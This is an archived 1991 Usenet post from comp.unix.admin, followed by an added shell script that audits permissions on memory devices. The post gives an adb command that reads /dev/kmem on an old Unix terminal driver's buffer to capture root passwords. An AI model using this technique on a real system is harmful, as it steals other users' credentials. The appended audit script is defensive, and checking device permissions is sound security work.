Path: utzoo!utgpu!news-server.csri.toronto.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!cs.utexas.edu!sun-barr!apple!portal!cup.portal.com!ts
From: ts@cup.portal.com (Tim W Smith)
Newsgroups: comp.unix.admin
Subject: Re: Kmem security (was: Re: How do you make your UNIX crash ???
Message-ID: <40479@cup.portal.com>
Date: 23 Mar 91 09:52:02 GMT
References: <513@bria> <1991Mar12.132003.27383@cs.widener.edu> <1991Mar18.153201.23325@lth.se> <601@minya.UUCP>
Organization: The Portal System (TM)
Lines: 23

A lot depends on how your terminal driver works. For instance,
there was one version of Unix (32V, I believe), whose terminal driver
used a global buffer for canonicalization. On this system, you would
just do something like

	yes "_canonb/S" | adb /unix /dev/kmem

and sit back and wait. Sure, you got a lot of garbage. But every
so often, you would see something like:

	_canonb:	root

followed by

	_canonb:	foobar

where foobar would be a pretty good thing to try for the root password.
Sometimes it was wrong, but sometimes it was right, and that's enough.

					Tim Smith
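
The command in the post only works for a user who can open /dev/kmem for reading. As an added example (not part of the original post), this script flags memory device nodes whose mode grants any access to users outside the owner and group; the device list and the function names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post: audit memory device nodes
# for permissions that let users outside owner and group open them.

# Assumed device list; adjust for the system being audited.
MEM_DEVICES="/dev/kmem /dev/mem /dev/port"

# Print the three "other" permission characters of a path, e.g. "r--".
# Columns 8-10 of the ls -ld mode string are the "other" triplet.
other_perms() {
    ls -ld -- "$1" | cut -c8-10
}

# Return 0 if the path exists and grants any access to "other".
# "--T" is the sticky bit without execute, which grants no access.
is_world_accessible() {
    [ -e "$1" ] || return 1
    case "$(other_perms "$1")" in
        ---|--T) return 1 ;;
        *)       return 0 ;;
    esac
}

# Print one line per path: MISSING, RISKY or OK, with the mode string.
audit_mem_devices() {
    for dev in "$@"; do
        if [ ! -e "$dev" ]; then
            echo "MISSING $dev"
        elif is_world_accessible "$dev"; then
            echo "RISKY   $dev $(ls -ld -- "$dev" | cut -c1-10)"
        else
            echo "OK      $dev $(ls -ld -- "$dev" | cut -c1-10)"
        fi
    done
}

# Word splitting of the device list is intentional here.
audit_mem_devices $MEM_DEVICES
```

A node reported as OK can still be group-readable, so any setgid program in that group remains part of the trust boundary.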